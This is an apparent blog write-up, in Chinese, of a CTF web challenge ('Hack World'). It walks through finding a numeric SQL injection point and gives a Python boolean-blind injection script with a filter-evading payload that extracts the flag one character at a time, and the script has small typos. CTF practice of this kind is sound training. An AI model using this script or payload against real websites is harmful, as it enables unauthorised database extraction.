BUUCTF [CISCN2019 华北赛区 Day2 Web1] Hack World

1、通过题目,可以知道该题目为SQL注入类型:

2、判断注入类型为数字注入:

3、通过BP抓包,来判断注入点。

字典爆破发现常规的注入方式都被过滤。

4、因此可以尝试通过布尔盲注的方式来得到flag。编写脚本得到flag

import requests

url = "http://977ba0f7-8772-4617-9600-8089c3d7e1e3.node5.buuoj.cn:81/index.php"

result = ""

for i in range(1, 50):

for j in range(32, 128):

payload = "(ascii(substr((select(flag)from(flag)),{m},1))>{n})"

response = requests.post(url=url, data={'id': payload.format(m=i, n=j)})

{m} 是当前正在提取的 flag 字符位置,{n} 是 ASCII 码值,用于比较。

f response.text.find('girl') == -1:

result += chr(j)

print(j)

break

print("正在输出flag:", result)

print("flag:", result)

#外层循环 (for i in range(1, 50)):循环遍历 flag 的每个字符位置,假设 flag 最长为 50 个字符。

#内层循环 (for j in range(32, 128)):循环遍历 ASCII 字符集中的可打印字符(从空格到 '~')。

#payload 变量:构造了一个 SQL 注入 payload,使用 substr() 函数逐个提取 flag 的字符,并通过 ascii() 函数转换为 ASCII 码值,然后与 j 比较。

5、得到flag:

相关推荐
MicroTech20256 分钟前
微算法科技(NASDAQ MLGO):以隐私计算区块链筑牢多方安全计算(MPC)安全防线
科技·安全·区块链
网安小白的进阶之路1 小时前
A模块 系统与网络安全 第四门课 弹性交换网络-4
网络·web安全·php
落一落,掉一掉1 小时前
第十五周Fscan和利用漏洞上线远程和数据库提权上线远控
安全·web安全
七夜zippoe1 小时前
高性能网络编程实战:用Tokio构建自定义协议服务器
linux·服务器·网络·rust·tokio
wsx_iot1 小时前
TCP/IP 五层协议栈
网络·网络协议·tcp/ip
午安~婉2 小时前
浏览器与网络
前端·javascript·网络·http·浏览器
深耕AI2 小时前
【端口的核心区别】阿里云安全组:80、443和16251
安全·阿里云·云计算
0和1的舞者4 小时前
网络通信的奥秘:网络层ip与路由详解(四)
大数据·网络·计算机网络·计算机·智能路由器·计算机科学与技术
Dobby_054 小时前
【Docker】容器网络探索(二):实战理解 host 网络
网络·docker·云原生
小糖学代码4 小时前
网络:4.应用层自定义协议与序列化
网络